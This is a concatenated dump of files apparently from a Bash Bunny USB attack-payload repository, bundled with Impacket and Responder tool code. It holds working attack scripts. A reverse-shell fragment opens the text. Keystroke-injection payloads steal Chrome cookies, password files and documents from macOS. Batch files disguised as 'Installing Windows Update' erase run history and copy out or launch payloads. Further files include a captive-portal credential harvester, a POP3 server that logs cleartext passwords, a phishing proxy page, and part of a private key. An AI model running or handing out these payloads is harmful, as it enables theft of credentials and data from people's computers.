pty.spawn\(\"\/bin\/bash\"\)\' $LHOST $LPORT \&\) 39 | QUACK ENTER 40 | QUACK DELAY 200 41 | QUACK SPACE 42 | QUACK STRING clear 43 | QUACK ENTER 44 | QUACK GUI q 45 | QUACK DELAY 100 46 | QUACK ENTER 47 | 48 | # Green is the official Light of "finished" 49 | LED G -------------------------------------------------------------------------------- 
/payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/utils/tcpshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2013-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # TCP interactive shell 9 | # 10 | # Author: 11 | # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) 12 | # 13 | # Description: 14 | # Launches a TCP shell for interactive use of clients 15 | # after successful relaying 16 | import socket 17 | #Default listen port 18 | port = 11000 19 | class TcpShell: 20 | def __init__(self): 21 | global port 22 | self.port = port 23 | #Increase the default port for the next attack 24 | port += 1 25 | 26 | def listen(self): 27 | #Set up the listening socket 28 | serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 | #Bind on localhost 30 | serversocket.bind(('127.0.0.1', self.port)) 31 | #Dont allow a backlog 32 | serversocket.listen(0) 33 | self.connection, host = serversocket.accept() 34 | #Create a file object from the socket 35 | self.socketfile = self.connection.makefile() -------------------------------------------------------------------------------- /payloads/library/GitBunnyGit/README.md: -------------------------------------------------------------------------------- 1 | # Git-Bunny-Git 2 | 3 | Author: Draxiom & audibleblink 4 | Version: 1.0 5 | 6 | ## Description 7 | 8 | Clones the bashbunny-payloads repository and also will update an existing repository. Use this payload to get all the other payloads! 9 | 10 | ## Configuration 11 | 12 | Configured for nix by default. Swap RNDIS_ETHERNET with ECM_ETHERNET on Windows 13 | 14 | ## Requirements 15 | 16 | Target must be sharing internet. BashBunny must have git installed. 17 | 18 | 1. 
Run bb.sh (pause at main menu) 19 | 2. Plug in da bunny 20 | 3. Connect (type 'c') 5 seconds after the white light 21 | 4. You can now ssh into the bunny (Run `tail -f /tmp/git` to montior progress) 22 | 23 | ## Status 24 | 25 | | LED | Status | 26 | | ---------------- | ------------------------------------- | 27 | | White | Ready (to share internet connection) | 28 | | Red | Failed (no internet) | 29 | | Red (blinking) | Failed (could not mount filesystem) | 30 | | Amber | Running | 31 | | Purple | Cleaning Up | 32 | | Green (blinking) | Finished (git pull) | 33 | | Green | Finished (git clone) | 34 | -------------------------------------------------------------------------------- /payloads/library/SmacAndGrab/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: sMacAndGrab 4 | # Author: audibleblink 5 | # Target: macOS 6 | # Version: 1.1 7 | # 8 | # Backup a list of files from macOS 9 | # 10 | # Yellow (blinking)...Attacking 11 | # Green...............Finished 12 | 13 | LED G R 500 14 | ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E 15 | 16 | # make the loot directory on the BashBunny 17 | mkdir -p /root/udisk/loot/sMacAndGrab 18 | 19 | # mounted device name 20 | dev_name="BashBunny" 21 | 22 | # loot directory when mounted on the mac 23 | lootdir="/Volumes/$dev_name/loot/sMacAndGrab" 24 | 25 | # Add files, folders, or commands that return filenames 26 | files_to_copy=( 27 | "\"~/Library/Application Support/Google/Chrome/Default/Cookies\"" # Quote paths with spaces 28 | "~/Dropbox" 29 | "\$(grep -lr password ~/Documents)" # Escape the subshell to have this run on TARGET 30 | ) 31 | 32 | QUACK GUI SPACE 33 | QUACK DELAY 1000 34 | QUACK STRING terminal 35 | QUACK ENTER 36 | QUACK DELAY 4000 37 | # the more files in $files to copy, the longer tar will take to compress 38 | # one-liner because we want the move command to wait for tar to finish 39 | QUACK STRING tar -cf \$USER.tar.gz 
${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal 40 | QUACK ENTER 41 | 42 | # sync the filesystem 43 | sync 44 | LED G 45 | 46 | -------------------------------------------------------------------------------- /payloads/library/ExecutableInstaller/e.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | @echo Installing Windows Update 3 | 4 | REM Delete registry keys storing Run dialog history 5 | REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f 6 | 7 | REM Below is for copying a directory with a payload inside the root directory of the Bash Bunny USB Mass Storage. 8 | REM echo d | xcopy /C /Q /Y /E %~dp0\..\..\PAYLOAD_FOLDER_IN_ROOT %APPDATA%\PAYLOAD_FOLDER_IN_ROOT 9 | 10 | REM Copy payload.exe from the root of the bash Bash Bunny USB Mass Storage (change to whatever you like). 11 | copy %~dp0\..\..\payload.exe %APPDATA%\payload.exe 12 | 13 | REM Below is for executing a payload inside a directory (see comments above). Change --startup to whatever parameters you wish to pass (or remove it). 14 | REM start "" "%APPDATA%\PAYLOAD_FOLDER_IN_ROOT\payload.exe" --startup 15 | 16 | REM Launch payload.exe with the startup parameter. Change --startup to whatever parameters you wish to pass (or remove it). 
17 | start "" "%APPDATA%\payload.exe" --startup 18 | 19 | REM Blink CAPSLOCK key (from usb_exfiltrator) 20 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 21 | 22 | @cls 23 | @exit -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/files/AccessDenied.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Website Blocked: ISA Proxy Server 4 | 14 | 15 | 16 | 17 |
18 |
19 |
New Security Policy: Website Blocked
20 |
    21 |
    22 |
    23 |
  • Access has been blocked. Please download and install the new Proxy Client in order to access internet resources.
  • 24 |
    25 |
26 |
27 | 28 |
29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /payloads/library/macinfograbber/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Mac Info Grabber 4 | # Author: kmakblob 5 | # Version: 1.2 6 | # 7 | # Steaks cookies from chrome and documents from the documents folder (spreadsheets) 8 | # then stashes them in /root/udisk/loot/MacLoot 9 | # 10 | # Amber..............Executing payload 11 | # Red................Failed to get spreadsheets 12 | # Purple.............Got some spreadsheets 13 | # Green..............Finished 14 | # 15 | 16 | LED G R 17 | ATTACKMODE HID STORAGE 18 | 19 | lootdir=loot/MacLoot 20 | mkdir -p /root/udisk/$lootdir 21 | 22 | QUACK GUI SPACE 23 | QUACK DELAY 1000 24 | QUACK STRING terminal 25 | QUACK ENTER 26 | QUACK DELAY 5000 27 | QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx 28 | QUACK ENTER 29 | QUACK DELAY 500 30 | QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> 31 | /Volumes/BashBunny/$lootdir/chromecookies.db 32 | QUACK ENTER 33 | QUACK DELAY 1000 34 | QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal 35 | QUACK ENTER 36 | 37 | # Sync filesystem 38 | sync 39 | 40 | # Green LED for finished 41 | LED G 42 | 43 | files=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xls 2> /dev/null | wc -l) 44 | files2=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xlsx 2> /dev/null | wc -l) 45 | 46 | if [ "$files" != "0" -o "$files2" != "0"]; then 47 | # Got spreadsheet files 48 | LED R B 49 | else 50 | LED R 51 | # No spread sheets 52 | fi 53 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/README.md: -------------------------------------------------------------------------------- 1 | # BunnyTap for Bash Bunnys 2 | 3 | Author: Whistle Master 4 | Version: Version 1.0 5 | Credit: 
@SamyKamkar 6 | 7 | ## Description 8 | 9 | Based on PoisonTap created by @SamyKamkar || https://samy.pl 10 | 11 | ## Configuration 12 | 13 | Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix 14 | 15 | ## Requirements 16 | 17 | dnsspoof must be installed (use install.sh) 18 | 19 | ## Install LED STATUS 20 | 21 | | LED | Status | 22 | | ---------------- | -------------------------------------- | 23 | | White (blinking) | Dependencies not met | 24 | | Purple | Setup | 25 | | Purple (blinking)| Installing dependencies | 26 | | White (blinking) | Finished installing | 27 | | Red (blinking) | Install failed, no Internet connection | 28 | 29 | ## Payload LED STATUS 30 | 31 | | LED | Status | 32 | | ---------------- | -------------------------------------- | 33 | | Green (blinking) | BunnyTap Setup | 34 | | Blue | BunnyTap running | 35 | 36 | ## Discussion 37 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40240-poisontap-on-the-bunny/ "Hak5 Forum Thread") 38 | -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/e.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | @echo Installing Windows Update 3 | 4 | REM Delete registry keys storing Run dialog history 5 | REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f 6 | 7 | REM Creates directory compromised of computer name, date and time 8 | REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious 9 | set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% 10 | mkdir %dst% >>nul 11 | 12 | if Exist %USERPROFILE%\Documents ( 13 | REM /C Continues copying even if errors occur. 14 | REM /Q Does not display file names while copying. 15 | REM /G Allows the copying of encrypted files to destination that does not support encryption. 
16 | REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. 17 | REM /E Copies directories and subdirectories, including empty ones. 18 | 19 | REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul 20 | 21 | REM Same as above but does not create empty directories 22 | xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul 23 | ) 24 | 25 | REM Blink CAPSLOCK key 26 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 27 | 28 | @cls 29 | @exit -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/FindSQLSrv.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 
17 | from socket import * 18 | 19 | print 'MSSQL Server Finder 0.1' 20 | 21 | s = socket(AF_INET,SOCK_DGRAM) 22 | s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1) 23 | s.settimeout(2) 24 | s.sendto('\x02',('255.255.255.255',1434)) 25 | 26 | try: 27 | while 1: 28 | data, address = s.recvfrom(8092) 29 | if not data: 30 | break 31 | else: 32 | print "===============================================================" 33 | print "Host details:",address[0] 34 | print data[2:] 35 | print "===============================================================" 36 | print "" 37 | except: 38 | pass 39 | 40 | 41 | -------------------------------------------------------------------------------- /payloads/library/Captiveportal/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Captiveportal 4 | # Author: Sebkinne 5 | # Version: 1.0 6 | 7 | # Usage of bunny_helpers.sh to avoid problems with find in function startCaptiveportal 8 | https://forums.hak5.org/index.php?/topic/40237-install-tools/ 9 | 10 | # Add or remove inputs here 11 | INPUTS=(username password) 12 | 13 | # Enable Ethernet (RNDIS = Windows, ECM = mac/*nix) 14 | ATTACKMODE RNDIS_ETHERNET 15 | #ATTACKMODE ECM_ETHERNET 16 | 17 | ################################################################## 18 | # DO NOT EDIT BELOW THIS LINE # 19 | ################################################################## 20 | 21 | # Sets up iptable forwarding and filters 22 | function setupNetworking() { 23 | echo 1 > /proc/sys/net/ipv4/ip_forward 24 | iptables -A INPUT -i usb0 -p udp --dport 53 -j ACCEPT 25 | iptables -A INPUT -i usb0 -p tcp --dport 443 -j DROP 26 | iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 80 -j DNAT --to-destination 172.16.64.1:8080 27 | iptables -t nat -A PREROUTING -i usb0 -p udp --dport 53 -j DNAT --to-destination 172.16.64.1:53 28 | iptables -t nat -A POSTROUTING -j MASQUERADE 29 | } 30 | 31 | # Find payload directory and execute payload 32 | 
function startCaptiveportal() { 33 | # cd $(dirname $(find /root/udisk/payloads/ -name portal.html)) 34 | cd /root/udisk/payloads/$SWITCH_POSITION 35 | chmod +x captiveportal 36 | ./captiveportal ${INPUTS[@]} 37 | } 38 | 39 | LED G 200 40 | setupNetworking 41 | startCaptiveportal & 42 | LED B 0 43 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/test_TCP_bug_issue7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from ImpactPacket import TCP, ImpactPacketException 8 | from binascii import hexlify 9 | import unittest 10 | from threading import Thread 11 | 12 | class TestTCP(unittest.TestCase): 13 | 14 | def setUp(self): 15 | # Dummy TCP header with "Maximum Segment Size" Option and zero length 16 | self.frame = '\x12\x34\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00\x60\x00\x00\x00\x8d\x5c\x00\x00\x02\x00\x00\x00' 17 | 18 | def test_01(self): 19 | 'Test TCP options parsing hangs' 20 | class it_hangs(Thread): 21 | def __init__(self): 22 | Thread.__init__(self) 23 | def run(self): 24 | try: 25 | frame = '\x12\x34\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00' \ 26 | '\x60\x00\x00\x00\x8d\x5c\x00\x00\x02\x00\x00\x00' 27 | tcp = TCP(frame) 28 | #except Exception,e: 29 | # print "aaaaaaaaaaaaaaa" 30 | # print e 31 | #except Exception,e: 32 | except ImpactPacketException,e: 33 | if str(e) != "'TCP Option length is too low'": 34 | raise e 35 | except: 36 | pass 37 | 38 | thread_hangs = it_hangs() 39 | thread_hangs.setDaemon(True) 40 | thread_hangs.start() 41 | thread_hangs.join(1.0) # 1 seconds timeout 42 | self.assertEqual(thread_hangs.isAlive(), False) 43 | #if thread_hang.isAlive(): 44 | 45 | 46 | suite = unittest.TestLoader().loadTestsFromTestCase(TestTCP) 47 | 
unittest.TextTestRunner(verbosity=2).run(suite) 48 | 49 | -------------------------------------------------------------------------------- /payloads/library/90sMode/readme.md: -------------------------------------------------------------------------------- 1 | # 90s Mode for Bash Bunnys 2 | 3 | * Author: Hak5Darren 4 | * Version: Version 1.0 5 | * Category: Prank 6 | * Target: Windows XP SP3+ / Powershell 7 | 8 | 9 | ## Description 10 | 11 | Turns back the clock to a k-rad ultra ereet 1990's VGA resolution 12 | Executes p.ps1 from the selected switch folder of the Bash Bunny USB Disk partition. 13 | 14 | ## Unnecessary Background Story 15 | 16 | Once a family member asked me to troubleshoot their computer. They claimed their hard drive was filling up. I checked and they had barely used the enormous (at the time) 20 GB HDD. Sorry I said, everything looks good. No they exclaimed, loading all of these cool programs from the World Wide Web was fine, but there's barely any room for another icon! 17 | 18 | Oh. Yes. About that... So I did what any good geek would and increased their resolution from 800x600 to 1024x768. Voila! More desktop real estate! 19 | 20 | Great! But now I need my reading glasses! 
21 | 22 | So, one could say this payload *decreases* the disk space of the victim computer ;-) 23 | 24 | ## Configuration 25 | 26 | By default the payload switches to the very cool 640x480 resoluiton, however this can be configured to other standards such as 800x600 or 1024x768 in the last line of r.ps1 (this should eventually become a config line in payload.txt) 27 | 28 | ## STATUS 29 | 30 | | LED | Status | 31 | | ------------------ | -------------------------------------------- | 32 | | Purple | Attack Setup | 33 | | Green | Attack Complete | 34 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/mssqlinstance.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Description: [MC-SQLR] example. 
Retrieves the instances names from the target host 9 | # 10 | # Author: 11 | # Alberto Solino (@agsolino) 12 | # 13 | # Reference for: 14 | # Structure 15 | # 16 | 17 | 18 | import argparse 19 | import sys 20 | import string 21 | import logging 22 | 23 | from impacket.examples import logger 24 | from impacket import version, tds 25 | 26 | if __name__ == '__main__': 27 | 28 | print version.BANNER 29 | # Init the example's logger theme 30 | logger.init() 31 | 32 | parser = argparse.ArgumentParser(add_help = True, description = "Asks the remote host for its running MSSQL Instances.") 33 | 34 | parser.add_argument('host', action='store', help='target host') 35 | parser.add_argument('-timeout', action='store', default='5', help='timeout to wait for an answer') 36 | 37 | if len(sys.argv)==1: 38 | parser.print_help() 39 | sys.exit(1) 40 | 41 | options = parser.parse_args() 42 | 43 | ms_sql = tds.MSSQL(options.host) 44 | instances = ms_sql.getInstances(string.atoi(options.timeout)) 45 | if len(instances) == 0: 46 | "No MSSQL Instances found" 47 | else: 48 | for i, instance in enumerate(instances): 49 | logging.info("Instance %d" % i) 50 | for key in instance.keys(): 51 | print key + ":" + instance[key] 52 | 53 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_wps.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Copyright (c) 2003-2013 CORE Security Technologies 4 | # 5 | # This software is provided under under a slightly modified version 6 | # of the Apache Software License. See the accompanying LICENSE file 7 | # for more information. 
8 | # 9 | # $Id$ 10 | # 11 | # Description: 12 | # Tests for WPS packets 13 | # 14 | # Author: 15 | # Aureliano Calvo 16 | 17 | 18 | # sorry, this is very ugly, but I'm in python 2.5 19 | import sys 20 | sys.path.insert(0,"../../..") 21 | 22 | 23 | import unittest 24 | from impacket import wps 25 | import array 26 | 27 | 28 | class TestTLVContainer(unittest.TestCase): 29 | 30 | def testNormalUsageContainer(self): 31 | BUILDERS={ 32 | 1: wps.StringBuilder(), 33 | 2: wps.ByteBuilder(), 34 | 3: wps.NumBuilder(2) 35 | } 36 | tlvc = wps.TLVContainer(builders=BUILDERS) 37 | 38 | KINDS_N_VALUES = ( 39 | (1, "Sarlanga"), 40 | (2, 1), 41 | (3, 1024), 42 | (4, array.array("B", [1,2,3])) 43 | ) 44 | for k,v in KINDS_N_VALUES: 45 | tlvc.append(k,v) 46 | 47 | tlvc2 = wps.TLVContainer(builders=BUILDERS) 48 | tlvc2.from_ary(tlvc.to_ary()) 49 | 50 | for k,v in KINDS_N_VALUES: 51 | self.assertEqual(v, tlvc2.first(k)) 52 | 53 | self.assertEqual(tlvc.to_ary(), tlvc2.to_ary()) 54 | self.assertEquals("Sarlanga", tlvc.first(1)) 55 | 56 | suite = unittest.TestLoader().loadTestsFromTestCase(TestTLVContainer) 57 | unittest.TextTestRunner(verbosity=2).run(suite) -------------------------------------------------------------------------------- /payloads/library/nmapper/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Nmapper for Bash Bunny 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # 7 | # Scans target with nmap using specified options 8 | # Saves sequential logs to mass storage loot folder 9 | # 10 | # Red ...........Setup 11 | # Red Blinking...Setup Failed. Target did not obtain IP address. Exit. 12 | # Amber..........Scanning 13 | # White..........Switching to Mass Storage (optional) 14 | # Green..........Finished 15 | # 16 | 17 | # See nmap --help for options. Default "-O --fuzzy" profiles target OS. 
18 | NMAP_OPTIONS="-O --fuzzy" 19 | LOOTDIR=/root/udisk/loot/nmap 20 | 21 | # Set LED Red while setting up attack 22 | LED R 23 | 24 | # Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET 25 | ATTACKMODE RNDIS_ETHERNET 26 | #ATTACKMODE ECM_ETHERNET 27 | 28 | # Source bunny_helpers.sh to get environment variable TARGET_IP and TARGET_HOSTNAME 29 | source bunny_helpers.sh 30 | 31 | # Setup named logs in loot directory 32 | mkdir -p $LOOTDIR 33 | HOST=${TARGET_HOSTNAME} 34 | # If hostname is blank set it to "noname" 35 | [[ -z "$HOST" ]] && HOST="noname" 36 | COUNT=$(ls -lad $LOOTDIR/$HOST*.log | wc -l) 37 | COUNT=$((COUNT+1)) 38 | 39 | # Check target IP address. If unset, blink RED and end. 40 | if [ -z "${TARGET_IP}" ]; then 41 | LED R 100 42 | exit 1 43 | fi 44 | 45 | # Set LED, nmap target and sync filesystem before optionally switching to mass storage 46 | LED G R 47 | nmap $NMAP_OPTIONS $TARGET_IP >> $LOOTDIR/$HOST-$COUNT.log 48 | sync 49 | 50 | # Optionally become mass storage when scan completes 51 | #LED R G B 52 | #ATTACKMODE STORAGE 53 | 54 | # Payload complete. Set LED green 55 | LED G 56 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/install.sh: -------------------------------------------------------------------------------- 1 | # To avoid the use of find in the next section, let's verify the switch position 2 | # and therefore the exact position of tools_to_install 3 | source bunny_helpers.sh 4 | 5 | # Check to ensure that the tools_to_install directory isn't empty. 6 | # Exit with solid red LED if it is, otherwise note tools in log. 
7 | TOOLSDIR=/root/udisk/payloads/$SWITCH_POSITION/tools_to_install/ 8 | if [ "$(ls -A $TOOLSDIR)" ]; then 9 | cd $TOOLSDIR 10 | echo "Available Tools:" > /tmp/tools_installer.log 11 | echo "----------------" >> /tmp/tools_installer.log 12 | for i in $(ls -d */); do echo ${i%%/} >> /tmp/tools_installer.log; done 13 | else 14 | LED R 15 | exit 1 16 | fi 17 | 18 | # Set LED to purple blinking and move tools 19 | LED R B 100 20 | mkdir -p /pentest 21 | mv $TOOLSDIR/* /pentest/ 22 | 23 | # Be sure that there are no OS made hidden files in the directory 24 | rm .* 25 | 26 | # Set LED to purple solid and check that move completed 27 | LED R B 28 | if [ "$(ls -A $TOOLSDIR)" ]; then 29 | # Set LED to red on fail and exit 30 | LED R 31 | exit 1 32 | else 33 | # Set LED to amber blinking on setup 34 | LED G R 100 35 | 36 | # Setup impacket 37 | cd /pentest/impacket 38 | python ./setup.py install 39 | 40 | # Additional tool setup goes here 41 | 42 | # List installed tools in /pentest and save to tools.txt on USB disk 43 | cd /pentest/ 44 | echo "Installed Tools:" > /root/udisk/installed-tools.txt 45 | echo "----------------" >> /root/udisk/installed-tools.txt 46 | for i in $(ls -d */); do echo ${i%%/} >> /root/udisk/installed-tools.txt; done 47 | sync && sleep 1 && sync 48 | 49 | # Set LED to white on success 50 | LED R G B 51 | exit 0 52 | fi 53 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/eap.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 
6 | # 7 | # Description: 8 | # EAP packets 9 | # 10 | # Author: 11 | # Aureliano Calvo 12 | 13 | 14 | from impacket.helper import ProtocolPacket, Byte, Word, Long, ThreeBytesBigEndian 15 | 16 | DOT1X_AUTHENTICATION = 0x888E 17 | 18 | class EAPExpanded(ProtocolPacket): 19 | """EAP expanded data according to RFC 3748, section 5.7""" 20 | 21 | WFA_SMI = 0x00372a 22 | SIMPLE_CONFIG = 0x00000001 23 | 24 | header_size = 7 25 | tail_size = 0 26 | 27 | vendor_id = ThreeBytesBigEndian(0) 28 | vendor_type = Long(3, ">") 29 | 30 | class EAPR(ProtocolPacket): 31 | """It represents a request or a response in EAP (codes 1 and 2)""" 32 | 33 | IDENTITY = 0x01 34 | EXPANDED = 0xfe 35 | 36 | header_size = 1 37 | tail_size = 0 38 | 39 | type = Byte(0) 40 | 41 | class EAP(ProtocolPacket): 42 | REQUEST = 0x01 43 | RESPONSE = 0x02 44 | SUCCESS = 0x03 45 | FAILURE = 0x04 46 | 47 | header_size = 4 48 | tail_size = 0 49 | 50 | code = Byte(0) 51 | identifier = Byte(1) 52 | length = Word(2, ">") 53 | 54 | class EAPOL(ProtocolPacket): 55 | EAP_PACKET = 0x00 56 | EAPOL_START = 0x01 57 | EAPOL_LOGOFF = 0x02 58 | EAPOL_KEY = 0x03 59 | EAPOL_ENCAPSULATED_ASF_ALERT = 0x04 60 | 61 | DOT1X_VERSION = 0x01 62 | 63 | header_size = 4 64 | tail_size = 0 65 | 66 | version = Byte(0) 67 | packet_type = Byte(1) 68 | body_length = Word(2, ">") 69 | 70 | 71 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/logger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Description: This logger is intended to be used by impacket instead 9 | # of printing directly. 
This will allow other libraries to use their 10 | # custom logging implementation. 11 | # 12 | 13 | import logging 14 | import sys 15 | 16 | # This module can be used by scripts using the Impacket library 17 | # in order to configure the root logger to output events 18 | # generated by the library with a predefined format 19 | 20 | # If the scripts want to generate log entries, they can write 21 | # directly to the root logger (logging.info, debug, etc). 22 | 23 | class ImpacketFormatter(logging.Formatter): 24 | ''' 25 | Prefixing logged messages through the custom attribute 'bullet'. 26 | ''' 27 | def __init__(self): 28 | logging.Formatter.__init__(self,'%(bullet)s %(message)s', None) 29 | 30 | def format(self, record): 31 | if record.levelno == logging.INFO: 32 | record.bullet = '[*]' 33 | elif record.levelno == logging.DEBUG: 34 | record.bullet = '[+]' 35 | elif record.levelno == logging.WARNING: 36 | record.bullet = '[!]' 37 | else: 38 | record.bullet = '[-]' 39 | 40 | return logging.Formatter.format(self, record) 41 | 42 | def init(): 43 | # We add a StreamHandler and formatter to the root logger 44 | handler = logging.StreamHandler(sys.stdout) 45 | handler.setFormatter(ImpacketFormatter()) 46 | logging.getLogger().addHandler(handler) 47 | logging.getLogger().setLevel(logging.INFO) 48 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/POP3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 
9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from SocketServer import BaseRequestHandler 19 | from packets import POPOKPacket 20 | 21 | # POP3 Server class 22 | class POP3(BaseRequestHandler): 23 | def SendPacketAndRead(self): 24 | Packet = POPOKPacket() 25 | self.request.send(str(Packet)) 26 | return self.request.recv(1024) 27 | 28 | def handle(self): 29 | try: 30 | data = self.SendPacketAndRead() 31 | 32 | if data[0:4] == "USER": 33 | User = data[5:].replace("\r\n","") 34 | data = self.SendPacketAndRead() 35 | if data[0:4] == "PASS": 36 | Pass = data[5:].replace("\r\n","") 37 | 38 | SaveToDb({ 39 | 'module': 'POP3', 40 | 'type': 'Cleartext', 41 | 'client': self.client_address[0], 42 | 'user': User, 43 | 'cleartext': Pass, 44 | 'fullhash': User+":"+Pass, 45 | }) 46 | self.SendPacketAndRead() 47 | except Exception: 48 | pass 49 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/certs/responder.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k 3 | sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP 4 | 2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC 5 | 6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg 6 | WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF 7 | N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS 8 | 1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY 9 | 
